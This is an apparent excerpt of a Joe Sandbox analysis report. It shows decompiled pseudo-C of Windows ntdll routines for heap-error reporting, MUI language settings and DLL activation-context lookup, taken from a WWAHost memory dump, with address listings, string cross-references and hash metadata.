						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0395B150("Parameter3: %p\n",  *0x3a458ac);
				}
				_t119 =  *0x3a458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0395B150();
					} else {
						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x3a458b4);
					E0395B150("Last known valid blocks: before - %p, after - %p\n",  *0x3a458b0);
				} else {
					_t120 =  *0x3a458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0395B150();
				} else {
					E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0395B150("Stack trace available at %p\n", 0x3a458c0);
			}











                                              0x03a11c10
                                              0x03a11c16
                                              0x03a11c1e
                                              0x03a11c3d
                                              0x03a11c3e
                                              0x03a11c20
                                              0x03a11c35
                                              0x03a11c3a
                                              0x03a11c44
                                              0x03a11c55
                                              0x03a11c5a
                                              0x03a11c65
                                              0x03a11c67
                                              0x00000000
                                              0x03a11c6e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a11c67
                                              0x03a11cdc
                                              0x03a11ce5
                                              0x03a11d04
                                              0x03a11d05
                                              0x03a11ce7
                                              0x03a11cfc
                                              0x03a11d01
                                              0x03a11d0b
                                              0x03a11d17
                                              0x03a11d1f
                                              0x03a11d25
                                              0x03a11d30
                                              0x03a11d4f
                                              0x03a11d50
                                              0x03a11d32
                                              0x03a11d47
                                              0x03a11d4c
                                              0x03a11d61
                                              0x03a11d67
                                              0x03a11d68
                                              0x03a11d6e
                                              0x03a11d79
                                              0x03a11d98
                                              0x03a11d99
                                              0x03a11d7b
                                              0x03a11d90
                                              0x03a11d95
                                              0x03a11daa
                                              0x03a11db0
                                              0x03a11db1
                                              0x03a11db7
                                              0x03a11dc2
                                              0x03a11de1
                                              0x03a11de2
                                              0x03a11dc4
                                              0x03a11dd9
                                              0x03a11dde
                                              0x03a11df3
                                              0x03a11df9
                                              0x03a11dfa
                                              0x03a11e00
                                              0x03a11e0a
                                              0x03a11e13
                                              0x03a11e32
                                              0x03a11e33
                                              0x03a11e15
                                              0x03a11e2a
                                              0x03a11e2f
                                              0x03a11e39
                                              0x03a11e4a
                                              0x03a11e02
                                              0x03a11e02
                                              0x03a11e08
                                              0x00000000
                                              0x00000000
                                              0x03a11e08
                                              0x03a11e5b
                                              0x03a11e7a
                                              0x03a11e7b
                                              0x03a11e5d
                                              0x03a11e72
                                              0x03a11e77
                                              0x03a11e95

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 42c604a1c08dfc7dc1bf905db1b17ede9cd76b2b6f7e39dee1a07da9f6428211
                                              • Instruction ID: e12ede9f4bdd493a8afd0a174dffc3fac90dc8210c575c09937cd53f80900b34
                                              • Opcode Fuzzy Hash: 42c604a1c08dfc7dc1bf905db1b17ede9cd76b2b6f7e39dee1a07da9f6428211
                                              • Instruction Fuzzy Hash: 9961E43AE11248DFD651EB98D489D3573F4FB85930B09806FFA0A5F741D6349CA18F4A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03963D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E03963D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03961B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03961B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03961B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03961B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03961B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03974620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0399F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E039A1370(_t276, 0x3934e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0399BB40(0,  &_v68, _t170);
									if(L039643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0399BB40(_t257,  &_v68, _t243);
								if(L039643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E039A1370(_t278, 0x3934e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03974620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0399F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E039A1370(_v16, 0x3934e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0399BB40(_t262,  &_v68, _t244);
								if(L039643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E039A1370(_t282, 0x3934e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0399BB40(_t262,  &_v68, _t201);
							if(L039643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03974620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0399F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E039A1370(_t280, 0x3934e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0399BB40(_t267,  &_v68, _t245);
							if(L039643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E039A1370(_t284, 0x3934e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0399BB40(_t267,  &_v68, _t224);
						if(L039643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                              0x03963d3c
                                              0x03963d42
                                              0x03963d44
                                              0x03963d46
                                              0x03963d49
                                              0x03963d4c
                                              0x03963d4f
                                              0x03963d52
                                              0x03963d55
                                              0x03963d58
                                              0x03963d5b
                                              0x03963d5f
                                              0x03963d61
                                              0x03963d66
                                              0x039b8213
                                              0x039b8218
                                              0x03964085
                                              0x03964088
                                              0x0396408e
                                              0x03964094
                                              0x0396409a
                                              0x039640a0
                                              0x039640a6
                                              0x039640a9
                                              0x039640af
                                              0x039640b6
                                              0x039640bd
                                              0x039640bd
                                              0x03963d83
                                              0x039b821f
                                              0x039b8229
                                              0x039b8238
                                              0x039b8238
                                              0x039b823d
                                              0x039b823d
                                              0x03963da0
                                              0x03963daf
                                              0x03963db5
                                              0x03963dba
                                              0x03963dba
                                              0x03963dd4
                                              0x03963e94
                                              0x03963eab
                                              0x03963f6d
                                              0x03963f84
                                              0x0396406b
                                              0x0396406b
                                              0x0396406e
                                              0x0396406e
                                              0x03964070
                                              0x03964074
                                              0x039b8351
                                              0x039b8351
                                              0x0396407a
                                              0x0396407f
                                              0x039b835d
                                              0x039b8370
                                              0x039b8377
                                              0x039b8379
                                              0x039b837c
                                              0x039b837c
                                              0x039b835d
                                              0x00000000
                                              0x0396407f
                                              0x03963f8a
                                              0x03963f8d
                                              0x03963f90
                                              0x03963f95
                                              0x039b830d
                                              0x039b830f
                                              0x03963f9b
                                              0x03963fac
                                              0x03963fae
                                              0x03963fb1
                                              0x03963fb1
                                              0x03963fb6
                                              0x039b8317
                                              0x039b831a
                                              0x00000000
                                              0x03963fbc
                                              0x03963fc1
                                              0x03963fc9
                                              0x03963fd7
                                              0x03963fda
                                              0x03963fdd
                                              0x03964021
                                              0x03964021
                                              0x03964029
                                              0x03964030
                                              0x03964044
                                              0x03964046
                                              0x03964046
                                              0x03964044
                                              0x03964049
                                              0x039b8327
                                              0x039b8334
                                              0x039b8339
                                              0x039b833c
                                              0x0396404f
                                              0x0396404f
                                              0x0396404f
                                              0x03964051
                                              0x03964056
                                              0x03964063
                                              0x03964063
                                              0x03964068
                                              0x00000000
                                              0x03964068
                                              0x03963fdf
                                              0x03963fe2
                                              0x03963fe4
                                              0x03963fe7
                                              0x03963fef
                                              0x03964003
                                              0x03964005
                                              0x03964005
                                              0x0396400c
                                              0x03964013
                                              0x03964016
                                              0x03964017
                                              0x0396401b
                                              0x0396401e
                                              0x00000000
                                              0x0396401e
                                              0x03963fb6
                                              0x03963eb1
                                              0x03963eb4
                                              0x03963eb7
                                              0x03963ebc
                                              0x039b82a9
                                              0x039b82ab
                                              0x03963ec2
                                              0x03963ed3
                                              0x03963ed5
                                              0x03963ed8
                                              0x03963ed8
                                              0x03963edd
                                              0x039b82b3
                                              0x039b82b6
                                              0x00000000
                                              0x03963ee3
                                              0x03963ee8
                                              0x03963eed
                                              0x03963ef0
                                              0x03963ef3
                                              0x03963f02
                                              0x03963f05
                                              0x03963f08
                                              0x039b82c0
                                              0x039b82c3
                                              0x039b82c5
                                              0x039b82c8
                                              0x039b82d0
                                              0x039b82e4
                                              0x039b82e6
                                              0x039b82e6
                                              0x039b82ed
                                              0x039b82f4
                                              0x039b82f7
                                              0x039b82f8
                                              0x039b82fc
                                              0x039b82ff
                                              0x039b82ff
                                              0x03963f0e
                                              0x03963f11
                                              0x03963f16
                                              0x03963f1d
                                              0x03963f31
                                              0x039b8307
                                              0x039b8307
                                              0x03963f31
                                              0x03963f39
                                              0x03963f48
                                              0x03963f4d
                                              0x03963f50
                                              0x03963f50
                                              0x03963f53
                                              0x03963f58
                                              0x03963f65
                                              0x03963f65
                                              0x03963f6a
                                              0x00000000
                                              0x03963f6a
                                              0x03963edd
                                              0x03963dda
                                              0x03963ddd
                                              0x03963de0
                                              0x03963de5
                                              0x039b8245
                                              0x03963deb
                                              0x03963df7
                                              0x03963dfc
                                              0x03963dfe
                                              0x03963e01
                                              0x03963e01
                                              0x03963e06
                                              0x039b824d
                                              0x039b824f
                                              0x039b8254
                                              0x00000000
                                              0x03963e0c
                                              0x03963e11
                                              0x03963e16
                                              0x03963e19
                                              0x03963e29
                                              0x03963e2c
                                              0x03963e2f
                                              0x039b825c
                                              0x039b825f
                                              0x039b8261
                                              0x039b8264
                                              0x039b826c
                                              0x039b8280
                                              0x039b8282
                                              0x039b8282
                                              0x039b8289
                                              0x039b8290
                                              0x039b8293
                                              0x039b8294
                                              0x039b8298
                                              0x039b829b
                                              0x039b829b
                                              0x03963e35
                                              0x03963e38
                                              0x03963e3d
                                              0x03963e44
                                              0x03963e58
                                              0x039b82a3
                                              0x039b82a3
                                              0x03963e58
                                              0x03963e60
                                              0x03963e6f
                                              0x03963e74
                                              0x03963e77
                                              0x03963e77
                                              0x03963e7a
                                              0x03963e7f
                                              0x03963e8c
                                              0x03963e8c
                                              0x03963e91
                                              0x00000000
                                              0x03963e91

                                              Strings
                                              • Kernel-MUI-Language-Disallowed, xrefs: 03963E97
                                              • WindowsExcludedProcs, xrefs: 03963D6F
                                              • Kernel-MUI-Language-Allowed, xrefs: 03963DC0
                                              • Kernel-MUI-Number-Allowed, xrefs: 03963D8C
                                              • Kernel-MUI-Language-SKU, xrefs: 03963F70
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: a4fa8b41d74b72cf8165534ea19b274e80225740f40b86bd629b21595bdcf046
                                              • Instruction ID: 47fc92ccd8eda35e7aec8e78f4fdb465c638b1cb71ea0198f9dd54b64cdd0980
                                              • Opcode Fuzzy Hash: a4fa8b41d74b72cf8165534ea19b274e80225740f40b86bd629b21595bdcf046
                                              • Instruction Fuzzy Hash: 15F16B76D01619EFCB11DFD9C980AEEBBBDFF48690F15006AE405AB250E7349E01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03988E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E03988E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x3a4d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3a48464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3a45780 & 0x00000003) != 0) {
							E039D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3a45780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0399B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3a47984; // 0xb52ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3a48464; // 0x761c0110
					 *0x3a4b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03989B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3a45780 & 0x00000005) != 0) {
						_push(_t49);
						E039D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                              0x03988e0f
                                              0x03988e16
                                              0x03988e19
                                              0x03988e1b
                                              0x03988e21
                                              0x03988e7f
                                              0x03988e85
                                              0x039c9354
                                              0x039c936c
                                              0x039c9371
                                              0x039c937b
                                              0x039c9381
                                              0x039c9381
                                              0x039c937b
                                              0x03988e9d
                                              0x03988e9d
                                              0x03988e29
                                              0x03988e2c
                                              0x03988e38
                                              0x03988e3e
                                              0x03988e43
                                              0x03988eb5
                                              0x03988eb9
                                              0x039c92aa
                                              0x039c92af
                                              0x039c92e8
                                              0x039c92e8
                                              0x039c92af
                                              0x03988eb9
                                              0x03988e45
                                              0x03988e53
                                              0x03988e5b
                                              0x03988e5f
                                              0x03988e78
                                              0x03988e78
                                              0x03988e7d
                                              0x03988ec3
                                              0x03988ecd
                                              0x03988ed2
                                              0x03988ed2
                                              0x03988ec5
                                              0x03988ec5
                                              0x00000000
                                              0x03988e7d
                                              0x03988e67
                                              0x03988ea4
                                              0x039c931a
                                              0x00000000
                                              0x00000000
                                              0x039c9320
                                              0x03988ea4
                                              0x03988e70
                                              0x039c9325
                                              0x039c9340
                                              0x039c9345
                                              0x039c9345
                                              0x03988e76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 039C933B, 039C9367
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 039C932A
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 039C9357
                                              • LdrpFindDllActivationContext, xrefs: 039C9331, 039C935D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: 5b823902074167648d0b739c96f4aa9eadb86c80a96d15dc2581c949d8590fb1
                                              • Instruction ID: 02e491856b58e407457f014ed4b2b6806f3f181bd1873a71d89c3a1896e8b46a
                                              • Opcode Fuzzy Hash: 5b823902074167648d0b739c96f4aa9eadb86c80a96d15dc2581c949d8590fb1
                                              • Instruction Fuzzy Hash: 32411772A087199FDF35FB18884DA39B2ADEFC5384F8D45A9D80957153E760AC80C3A3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03968794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E03968794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0396934A() != 0) {
								_t159 = E039DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3a45780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E039D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3a45780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0396849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03968999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03968999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3a45c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3a45c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03972280(_t92, 0x3a486cc);
															_t94 = E03A29DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E039861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3a45c64 + _t91 * 8;
